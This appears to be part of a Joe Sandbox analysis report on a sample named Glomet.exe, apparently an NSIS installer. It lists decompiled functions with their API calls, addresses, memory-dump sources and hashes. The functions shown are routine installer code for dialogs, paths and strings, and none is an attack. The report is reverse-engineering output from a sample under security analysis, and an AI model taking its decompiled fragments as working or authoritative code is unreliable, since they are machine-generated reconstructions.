                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402EA8(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x429448; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f42c;
						if(_t2 >  *0x42f42c) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402E25, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040669F(0);
					}
				} else {
					_t6 =  *0x429448; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                                                                                                                                                                              0x00402eaf
                                                                                                                                                                              0x00402ec9
                                                                                                                                                                              0x00402ecf
                                                                                                                                                                              0x00402ed9
                                                                                                                                                                              0x00402edf
                                                                                                                                                                              0x00402ee5
                                                                                                                                                                              0x00402ef6
                                                                                                                                                                              0x00402eff
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402f04
                                                                                                                                                                              0x00402f0b
                                                                                                                                                                              0x00402ed1
                                                                                                                                                                              0x00402ed8
                                                                                                                                                                              0x00402ed8
                                                                                                                                                                              0x00402eb1
                                                                                                                                                                              0x00402eb1
                                                                                                                                                                              0x00402eb8
                                                                                                                                                                              0x00402ebb
                                                                                                                                                                              0x00402ebb
                                                                                                                                                                              0x00402ec1
                                                                                                                                                                              0x00402ec8
                                                                                                                                                                              0x00402ec8

                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402EBB
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402ED9
                                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F04
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                              • Opcode ID: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                                                                                                                              • Instruction ID: d6c9869078f7173a9f6fd6f2732e3e3a433b8c8c07e8cf938b477ca654505681
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                                                                                                                              • Instruction Fuzzy Hash: 30F05E30645620ABC6317BA0FE8C99B7B64A704B12BA1043AF101F22E4CA7408878BED
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405CD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                              			E00405CD7(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406257(0x42bc98, _a4);
				_t21 = E00405C82(0x42bc98);
				if(_t21 != 0) {
					E00406535(_t21);
					if(( *0x42f438 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004065CE();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C30(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BE9();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                                                              0x00405ce3
                                                                                                                                                                              0x00405cee
                                                                                                                                                                              0x00405cf2
                                                                                                                                                                              0x00405cf9
                                                                                                                                                                              0x00405d05
                                                                                                                                                                              0x00405d11
                                                                                                                                                                              0x00405d11
                                                                                                                                                                              0x00405d29
                                                                                                                                                                              0x00405d2a
                                                                                                                                                                              0x00405d31
                                                                                                                                                                              0x00405d32
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405d15
                                                                                                                                                                              0x00405d1c
                                                                                                                                                                              0x00405d24
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405d1c
                                                                                                                                                                              0x00405d34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405d48
                                                                                                                                                                              0x00405d07
                                                                                                                                                                              0x00405d0b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405d0b
                                                                                                                                                                              0x00405cf4
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405C90
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                                                                                                                              • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405D2A
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 3248276644-3916508600
                                                                                                                                                                              • Opcode ID: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                                                                                                                              • Instruction ID: 961b8afdf15cf8a693d93a37420b81600cf3221e3748574004b2986df105c153
                                                                                                                                                                              • Opcode Fuzzy Hash: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                                                                                                                              • Instruction Fuzzy Hash: 01F02D25108E6526E62632391D09AAF0645CD93324759453FFCA2762C1DB3C89439E6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004052EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                              			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x42a87c - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x42a87c = _t16;
								E00404CA7();
							}
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C27(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00404320(0x413);
					return 0;
				}
				goto L10;
			}






                                                                                                                                                                              0x004052f0
                                                                                                                                                                              0x004052fa
                                                                                                                                                                              0x00405310
                                                                                                                                                                              0x00405316
                                                                                                                                                                              0x00405338
                                                                                                                                                                              0x0040533b
                                                                                                                                                                              0x0040533b
                                                                                                                                                                              0x00405341
                                                                                                                                                                              0x00405343
                                                                                                                                                                              0x00405349
                                                                                                                                                                              0x0040534b
                                                                                                                                                                              0x0040534c
                                                                                                                                                                              0x0040534e
                                                                                                                                                                              0x00405354
                                                                                                                                                                              0x00405354
                                                                                                                                                                              0x00405349
                                                                                                                                                                              0x0040535e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040536c
                                                                                                                                                                              0x0040531b
                                                                                                                                                                              0x00405321
                                                                                                                                                                              0x00405323
                                                                                                                                                                              0x0040535b
                                                                                                                                                                              0x0040535b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040535b
                                                                                                                                                                              0x0040532f
                                                                                                                                                                              0x00405331
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405331
                                                                                                                                                                              0x00405300
                                                                                                                                                                              0x00405307
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040530c
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040531B
                                                                                                                                                                              • CallWindowProcA.USER32 ref: 0040536C
                                                                                                                                                                                • Part of subcall function 00404320: SendMessageA.USER32(0005001C,00000000,00000000,00000000), ref: 00404332
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                              • Opcode ID: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                                                                                                                              • Instruction ID: 088eb893e58e7befb787ec48b20f4cc5058787dea00b391af27f8784c6c771c5
                                                                                                                                                                              • Opcode Fuzzy Hash: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                                                                                                                              • Instruction Fuzzy Hash: 59017172204608ABEF206F11DD81A9B3769EB84395F541037FF05761D0C7BA8D629E2A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004039A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004039A8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854; // 0x0
				_t3 = E0040398D(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                                                                                                                                                                              0x004039a9
                                                                                                                                                                              0x004039b1
                                                                                                                                                                              0x004039b8
                                                                                                                                                                              0x004039bb
                                                                                                                                                                              0x004039bb
                                                                                                                                                                              0x004039bd
                                                                                                                                                                              0x004039c2
                                                                                                                                                                              0x004039c9
                                                                                                                                                                              0x004039cf
                                                                                                                                                                              0x004039d3
                                                                                                                                                                              0x004039d4
                                                                                                                                                                              0x004039dc

                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,7620FA90,00000000,C:\Users\user\AppData\Local\Temp\,00403980,0040379A,?,?,00000007,00000009,0000000B), ref: 004039C2
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004039C9
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004039A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 1100898210-3916508600
                                                                                                                                                                              • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                                              • Instruction ID: 4fd9126d001fd6f9661ff5a064fa74b3c5ec8a5f3f5490ff4f649df82ed95c92
                                                                                                                                                                              • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                                              • Instruction Fuzzy Hash: C5E0EC3261112057C7616F55EA0476AB7A86F49B66F0A006EE8847B2A08BB85C468BD8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405C30(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                                                                              0x00405c31
                                                                                                                                                                              0x00405c3b
                                                                                                                                                                              0x00405c3d
                                                                                                                                                                              0x00405c44
                                                                                                                                                                              0x00405c4c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405c4c
                                                                                                                                                                              0x00405c4e
                                                                                                                                                                              0x00405c53

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\programdata,00402F78,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009), ref: 00405C36
                                                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\programdata,00402F78,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?), ref: 00405C44
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                                              • String ID: C:\programdata
                                                                                                                                                                              • API String ID: 2709904686-3893646742
                                                                                                                                                                              • Opcode ID: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                                                                                                                              • Instruction ID: 122f4ef1c51afe0287f8aef094741ea3ea5c8e0f1b3bdfc6c9647d6fbcc18736
                                                                                                                                                                              • Opcode Fuzzy Hash: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                                                                                                                              • Instruction Fuzzy Hash: 75D0A76240CA746EF30362108D00B9F6A88DF13340F0A04E6F081A2190C2784C424BFD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405D4F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                              0x00405d5f
                                                                                                                                                                              0x00405d61
                                                                                                                                                                              0x00405d64
                                                                                                                                                                              0x00405d90
                                                                                                                                                                              0x00405d69
                                                                                                                                                                              0x00405d72
                                                                                                                                                                              0x00405d77
                                                                                                                                                                              0x00405d82
                                                                                                                                                                              0x00405d85
                                                                                                                                                                              0x00405da1
                                                                                                                                                                              0x00405d87
                                                                                                                                                                              0x00405d8e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405d8e
                                                                                                                                                                              0x00405d9a
                                                                                                                                                                              0x00405d9e
                                                                                                                                                                              0x00405d9e
                                                                                                                                                                              0x00405d98
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                              • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                                              • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                                                                                                                                              • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%